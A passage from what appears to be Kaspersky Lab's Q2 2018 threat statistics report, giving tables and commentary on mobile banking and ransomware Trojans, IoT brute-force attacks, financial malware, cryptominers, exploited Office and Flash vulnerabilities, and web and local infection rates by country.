Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). In second place was Trojan.AndroidOS.Boogr.gsh (12.17%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>). Third was Trojan-Dropper.AndroidOS.Lezok.p (4.41%), followed, by a close 0.3 p.p. margin, by Trojan.AndroidOS.Agent.rx (4.11%), which was in third position in Q1.\n\n### **Geography of mobile threats**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-3.png>)\n\n_Map of attempted infections using mobile malware, Q2 2018_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | Bangladesh | 31.17 \n2 | China | 31.07 \n3 | Iran | 30.87 \n4 | Nepal | 30.74 \n5 | Nigeria | 25.66 \n6 | India | 25.04 \n7 | Indonesia | 24.05 \n8 | Ivory Coast | 23.67 \n9 | Pakistan | 23.49 \n10 | Tanzania | 22.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second by a narrow margin. 
Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).\n\nThis quarter Russia (8.34%) was down in 38th spot, behind Taiwan (8.48%) and Singapore (8.46%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to nearly half of the detected new banking Trojans. Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175900/180803-it-threat-evolution-q2-2018-statistics-4.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n**TOP 10 mobile bankers**\n\n | **Verdict** | **%*** \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Agent.dq | 17.74 \n2 | Trojan-Banker.AndroidOS.Svpeng.aj | 13.22 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.56 \n4 | Trojan-Banker.AndroidOS.Asacub.e | 5.70 \n5 | Trojan-Banker.AndroidOS.Agent.di | 5.06 \n6 | Trojan-Banker.AndroidOS.Asacub.bo | 4.65 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 3.66 \n8 | Trojan-Banker.AndroidOS.Asacub.bj | 3.03 \n9 | Trojan-Banker.AndroidOS.Hqwar.t | 2.83 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.77 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal information about the user's banking cards and online banking credentials. They also steal money by abusing SMS services, including mobile banking. 
The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-5.png>)\n\n_Geography of mobile banking threats, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | **Country*** | **%**** \n---|---|--- \n1 | USA | 0.79 \n2 | Russia | 0.70 \n3 | Poland | 0.28 \n4 | China | 0.28 \n5 | Tajikistan | 0.27 \n6 | Uzbekistan | 0.23 \n7 | Ukraine | 0.18 \n8 | Singapore | 0.16 \n9 | Moldova | 0.14 \n10 | Kazakhstan | 0.13 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nOverall, the rating did not see much change from Q1: Russia (0.70%) and the USA (0.79%) swapped places, both remaining in the TOP 3.\n\nPoland (0.28%) rose from ninth to third place thanks to the active propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. 
The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.\n\n### Mobile ransomware Trojans\n\nIn Q2 2018, we detected **14,119** installation packages for mobile ransomware Trojans, which is half as many again as in Q1.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-6.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Zebt.a | 26.71 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ag | 19.15 \n3 | Trojan-Ransom.AndroidOS.Fusob.h | 15.48 \n4 | Trojan-Ransom.AndroidOS.Svpeng.ae | 5.99 \n5 | Trojan-Ransom.AndroidOS.Egat.d | 4.83 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 4.73 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 4.29 \n8 | Trojan-Ransom.AndroidOS.Small.cm | 3.32 \n9 | Trojan-Ransom.AndroidOS.Small.as | 2.61 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.80 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nThe most popular mobile ransomware in Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users who were attacked by this type of malware. 
Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175857/180803-it-threat-evolution-q2-2018-statistics-7.png>)\n\n_Geography of mobile ransomware Trojans, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans**\n\n | Country* | %** \n---|---|--- \n1 | USA | 0.49 \n2 | Italy | 0.28 \n3 | Kazakhstan | 0.26 \n4 | Belgium | 0.22 \n5 | Poland | 0.20 \n6 | Romania | 0.18 \n7 | China | 0.17 \n8 | Ireland | 0.15 \n9 | Mexico | 0.11 \n10 | Austria | 0.09 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 53.53% \n2 | Trojan-Ransom.AndroidOS.Svpeng.ae | 16.37% \n3 | Trojan-Ransom.AndroidOS.Svpeng.snt | 11.49% \n4 | Trojan-Ransom.AndroidOS.Svpeng.ab | 10.84% \n5 | Trojan-Ransom.AndroidOS.Fusob.h | 5.62% \n6 | Trojan-Ransom.AndroidOS.Svpeng.z | 4.57% \n7 | Trojan-Ransom.AndroidOS.Svpeng.san | 4.29% \n8 | Trojan-Ransom.AndroidOS.Svpeng.ac | 2.45% \n9 | Trojan-Ransom.AndroidOS.Svpeng.h | 0.43% \n10 | Trojan-Ransom.AndroidOS.Zebt.a | 0.37% \n \n_* Unique users in USA attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus in this country who were attacked by ransomware Trojans._\n\nItaly (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a. 
Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.\n\n## Attacks on IoT devices\n\nJudging by the data from our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. However, recently there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned to services for the remote control of routers \u2013 a feature that is in demand with internet service providers, for example. We have observed attempts to launch attacks on IoT devices via port 8291, which is used by the Mikrotik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.\n\nIn both cases the nature of the attacks was much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future on the back of the following two factors:\n\n * Brute forcing a Telnet password is a low-efficiency strategy, as there is strong competition between threat actors. 
Every few seconds there are brute force attempts; once successful, the threat actor blocks Telnet access for all other attackers.\n * After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.\n\nOn the other hand, the first attacker to exploit a vulnerability will gain access to a large number of devices, having spent minimal time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175929/180803-it-threat-evolution-q2-2018-statistics-8.png>)\n\n_Distribution of attacked services' popularity by number of unique attacking devices, Q2 2018_\n\n### Telnet attacks\n\nThe scheme of attack is as follows: the attackers find a victim device, check if the Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they preset service passwords on devices and leave the user no way to change them), such attacks succeed and may affect entire lines of devices. The infected devices then scan new network segments and infect similar devices or workstations in them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-9.png>)\n\n_Geography of IoT devices infected in Telnet attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices infected via Telnet**\n\n | Country | %* \n---|---|--- \n1 | Brazil | 23.38 \n2 | China | 17.22 \n3 | Japan | 8.64 \n4 | Russia | 7.22 \n5 | USA | 4.55 \n6 | Mexico | 3.78 \n7 | Greece | 3.51 \n8 | South Korea | 3.32 \n9 | Turkey | 2.61 \n10 | India | 1.71 \n \n_* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet._\n\nIn Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. 
Next came China (17.22%) by a small margin, and third came Japan (8.64%).\n\nIn these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.\n\n#### **TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n | Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.c | 15.97 \n2 | Trojan-Downloader.Linux.Hajime.a | 5.89 \n3 | Trojan-Downloader.Linux.NyaDrop.b | 3.34 \n4 | Backdoor.Linux.Mirai.b | 2.72 \n5 | Backdoor.Linux.Mirai.ba | 1.94 \n6 | Trojan-Downloader.Shell.Agent.p | 0.38 \n7 | Trojan-Downloader.Shell.Agent.as | 0.27 \n8 | Backdoor.Linux.Mirai.n | 0.27 \n9 | Backdoor.Linux.Gafgyt.ba | 0.24 \n10 | Backdoor.Linux.Gafgyt.af | 0.20 \n \n_* Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks_\n\n### SSH attacks\n\nSuch attacks are launched similarly to Telnet attacks, the only difference being that the bots need an SSH client installed in order to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords requires large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch attacks. The success of an SSH attack hinges on the faults of the device owner or manufacturer; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.\n\nChina took the lead in terms of infected devices attacking via SSH. 
Also, China was second in terms of infected devices attacking via Telnet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-10.png>)\n\n_Geography of IoT devices infected in SSH attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices attacked via SSH**\n\n | Country | %* \n---|---|--- \n1 | China | 15.77% \n2 | Vietnam | 11.38% \n3 | USA | 9.78% \n4 | France | 5.45% \n5 | Russia | 4.53% \n6 | Brazil | 4.22% \n7 | Germany | 4.01% \n8 | South Korea | 3.39% \n9 | India | 2.86% \n10 | Romania | 2.23% \n \n_* The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH_\n\n## Online threats in the financial sector\n\n### Q2 events\n\n#### **New banking Trojan DanaBot**\n\nThe Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic and steal passwords and crypto wallets \u2013 generally, a standard feature set for this type of threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body. DanaBot initially targeted Australian users and financial organizations; however, in early April we noticed that it had become active against financial organizations in Poland.\n\n#### **The peculiar BackSwap technique**\n\nThe banking Trojan BackSwap turned out to be much more interesting. A majority of similar threats, including **Zeus**, **Cridex** and **Dyreza**, intercept the user's traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then it uses this console to inject malicious scripts into web pages. 
In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.\n\n#### **Carbanak gang leader detained**\n\nOn March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came as a result of a joint operation between Spain's national police, Europol and the FBI, as well as Romanian, Moldovan, Belarusian and Taiwanese authorities and private infosecurity companies. It was expected that the leader's arrest would reduce the group's activity; however, recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The Carbanak email writers masquerade as the support lines of reputable anti-malware vendors, the European Central Bank and other organizations. Such emails contained attached weaponized documents exploiting the vulnerabilities CVE-2017-11882 and CVE-2017-8570.\n\n#### **Ransomware Trojan uses Doppelg\u00e4nging technique**\n\nKaspersky Lab experts [detected](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) a case of the ransomware Trojan SynAck using the Process Doppelg\u00e4nging technique. Malware writers use this complex technique to make their malware stealthier and to complicate its detection by security solutions. This was the first case in which it was used in a ransomware Trojan.\n\nAnother remarkable event was the Purga (aka Globe) cryptoware propagation [campaign](<https://securelist.ru/trojan-dimnie-and-ransomware-purga/90272/>), during which this cryptoware, along with other malware including a banking Trojan, was loaded onto computers infected with the Trojan Dimnie.\n\n### General statistics on financial threats\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
_\n\nIn Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175934/180803-it-threat-evolution-q2-2018-statistics-11.png>)\n\n \n_Number of unique users attacked by financial malware, Q2 2018_\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-12.png>)\n\n_Geography of banking malware attacks, Q2 2018_\n\n#### **TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% ****of users attacked**** \n---|---|--- \n1 | Germany | 2.7% \n2 | Cameroon | 1.8% \n3 | Bulgaria | 1.7% \n4 | Greece | 1.6% \n5 | United Arab Emirates | 1.4% \n6 | China | 1.3% \n7 | Indonesia | 1.3% \n8 | Libya | 1.3% \n9 | Togo | 1.3% \n10 | Lebanon | 1.2% \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.\n\n*Excluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### **TOP 10 banking malware families**\n\n| Name | Verdicts* | % of attacked users** \n---|---|---|--- \n1 | Nymaim | Trojan.Win32. Nymaim | 27.0% | \n2 | Zbot | Trojan.Win32. Zbot | 26.1% | \n3 | SpyEye | Backdoor.Win32. SpyEye | 15.5% | \n4 | Emotet | Backdoor.Win32. Emotet | 5.3% | \n5 | Caphaw | Backdoor.Win32. Caphaw | 4.7% | \n6 | Neurevt | Trojan.Win32. Neurevt | 4.7% | \n7 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 3.3% | \n8 | Gozi | Trojan.Win32. Gozi | 2.0% | \n9 | Shiz | Backdoor.Win32. Shiz | 1.5% | \n10 | ZAccess | Backdoor.Win32. 
ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2018, the general makeup of TOP 10 stayed the same, however there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users from 2.4% to 5.3%. Conversely, Caphaw dramatically downsized its activity to only 4.7% from 15.2% in Q1, taking fifth position in the rating.\n\n### Cryptoware programs\n\n#### **Number of new modifications**\n\nIn Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year's numbers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-13.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q2 2018_\n\n#### **Number of users attacked by Trojan cryptors**\n\nIn Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. 
Our statistics show that cybercriminals' activity declined both against Q1 and on a month-on-month basis during Q2.

_Number of unique users attacked by cryptors, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175940/180803-it-threat-evolution-q2-2018-statistics-14.png>)

#### **Geography of attacks**

[(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-15.png>)

#### **TOP 10 countries attacked by Trojan cryptors**

|   | Country* | % of users attacked by cryptors** |
|---|---|---|
| 1 | Ethiopia | 2.49 |
| 2 | Uzbekistan | 1.24 |
| 3 | Vietnam | 1.21 |
| 4 | Pakistan | 1.14 |
| 5 | Indonesia | 1.09 |
| 6 | China | 1.04 |
| 7 | Venezuela | 0.72 |
| 8 | Azerbaijan | 0.71 |
| 9 | Bangladesh | 0.70 |
| 10 | Mongolia | 0.64 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._

The list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some places changed hands within the TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place. Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.

#### **TOP 10 most widespread cryptor families**

|   | Name | Verdicts* | % of attacked users** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 53.92 |
| 2 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.92 |
| 3 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.81 |
| 4 | Shade | Trojan-Ransom.Win32.Shade | 2.40 |
| 5 | Crysis | Trojan-Ransom.Win32.Crusis | 2.13 |
| 6 | Cerber | Trojan-Ransom.Win32.Zerber | 2.09 |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 |
| 8 | Locky | Trojan-Ransom.Win32.Locky | 1.49 |
| 9 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.36 |
| 10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.04 |

_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

WannaCry further extended its lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%; it emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just as in Q1, are occupied by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl, etc.

### Cryptominers

As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is shrinking progressively, and cryptocurrency miners are starting to take its place. Therefore, this year we decided to begin publishing quarterly reports on the situation around this type of threat. At the same time, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. They include both stealth miners, which we detect as Trojans, and those which are issued the verdict 'Riskware not-a-virus'.

#### **Number of new modifications**

In Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.

_Number of new miner modifications, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175945/180803-it-threat-evolution-q2-2018-statistics-16.png>)

#### **Number of users attacked by cryptominers**

In Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.

_Number of unique users attacked by cryptominers, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175951/180803-it-threat-evolution-q2-2018-statistics-17.png>)

In April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers' activity.

#### **Geography of attacks**

_Geography of cryptominer attacks, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-18.png>)

#### **TOP 10 countries by percentage of attacked users**

|   | Country* | % of attacked users** |
|---|---|---|
| 1 | Ethiopia | 17.84 |
| 2 | Afghanistan | 16.21 |
| 3 | Uzbekistan | 14.18 |
| 4 | Kazakhstan | 11.40 |
| 5 | Belarus | 10.47 |
| 6 | Indonesia | 10.33 |
| 7 | Mozambique | 9.92 |
| 8 | Vietnam | 9.13 |
| 9 | Mongolia | 9.01 |
| 10 | Ukraine | 8.58 |

_* Excluded are countries with relatively few Kaspersky Lab product users (under 50,000)._
_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._

## Vulnerable apps used by cybercriminals

In Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such sharp growth was driven primarily by massive spam mailings distributing documents containing an exploit for the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This stack overflow-type vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works stably in all possible combinations of the Microsoft Office package and Microsoft Windows. Moreover, it allows the use of various obfuscations for bypassing protection. These two factors made this vulnerability the most popular tool in cybercriminals' hands in Q2. The shares of other Microsoft Office vulnerabilities did not change much since Q1.

Q2 KSN statistics also showed a growing number of Adobe Flash exploits launched via Microsoft Office. Despite Adobe's and Microsoft's efforts to obstruct exploitation of Flash Player, a new 0-day exploit, [CVE-2018-5002](<http://blogs.360.cn/blog/cve-2018-5002-en/>), was discovered in Q2. It propagated in an XLSX file and used a little-known technique allowing the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are rendered in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of an SWF file, the OLE object contains the actual file and a list of various properties, one of which points to the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file at all, but only carried a list of properties including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.

_Distribution of exploits used in cybercriminals' attacks by types of attacked applications, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-19.png>)

In late March 2018, a PDF document was detected on VirusTotal that contained two 0-day vulnerabilities: [CVE-2018-4990](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) and [CVE-2018-8120](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120>). The former allowed for execution of shellcode from JavaScript via exploitation of a software error in the JPEG2000 image processor in Acrobat Reader. The latter existed in the win32k function [SetImeInfoEx](<https://cloudblogs.microsoft.com/microsoftsecure/2018/07/02/taking-apart-a-double-zero-day-sample-discovered-in-joint-hunt-with-eset/>) and was used for further privilege escalation up to SYSTEM level, enabling the PDF viewer to escape the sandbox. An analysis of the document and our statistics show that at the moment of uploading to VirusTotal, this exploit was at the development stage and was not used for in-the-wild attacks.

In late April, Kaspersky Lab experts using an in-house sandbox found the 0-day vulnerability [CVE-2018-8174](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) in Internet Explorer and reported it to Microsoft. An exploit for this vulnerability used a technique associated with [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) (launching an HTA script from a remote source via a specially crafted OLE object) to exploit a vulnerable Internet Explorer component with the help of Microsoft Office. We are observing that exploit pack creators have already taken this vulnerability on board and are actively distributing exploits for it both via web sites and via emails containing malicious documents.

Also in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched by the security update MS17-010; these make up a majority of the detected network attacks.

## Attacks via web resources

_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Top 10 countries where online resources are seeded with malware

_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.

_Distribution of web attack sources by country, Q2 2018_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175958/180803-it-threat-evolution-q2-2018-statistics-20.png>)

In Q2, the TOP 4 web attack source countries remained unchanged. The US (45.87%) was home to most sources of web attacks.
The Netherlands (25.74%) came second by a large margin, and Germany (5.33%) was third. There was a change in fifth position: Russia (1.98%) displaced the UK, although its share decreased by 0.55 p.p.

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the _Malware class_; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

|   | Country* | % of attacked users** |
|---|---|---|
| 1 | Belarus | 33.49 |
| 2 | Albania | 30.27 |
| 3 | Algeria | 30.08 |
| 4 | Armenia | 29.98 |
| 5 | Ukraine | 29.68 |
| 6 | Moldova | 29.49 |
| 7 | Venezuela | 29.12 |
| 8 | Greece | 29.11 |
| 9 | Kyrgyzstan | 27.25 |
| 10 | Kazakhstan | 26.97 |
| 11 | Russia | 26.93 |
| 12 | Uzbekistan | 26.30 |
| 13 | Azerbaijan | 26.12 |
| 14 | Serbia | 25.23 |
| 15 | Qatar | 24.51 |
| 16 | Latvia | 24.40 |
| 17 | Vietnam | 24.03 |
| 18 | Georgia | 23.87 |
| 19 | Philippines | 23.85 |
| 20 | Romania | 23.55 |

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._
_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._
_** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._

_Geography of malicious web attacks in Q2 2018 (percentage of attacked users)_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175858/180803-it-threat-evolution-q2-2018-statistics-21.png>)

On average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.

## Local threats

_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._

In Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only _Malware-class_ attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

|   | Country* | % of attacked users** |
|---|---|---|
| 1 | Uzbekistan | 51.01 |
| 2 | Afghanistan | 49.57 |
| 3 | Tajikistan | 46.21 |
| 4 | Yemen | 45.52 |
| 5 | Ethiopia | 43.64 |
| 6 | Turkmenistan | 43.52 |
| 7 | Vietnam | 42.56 |
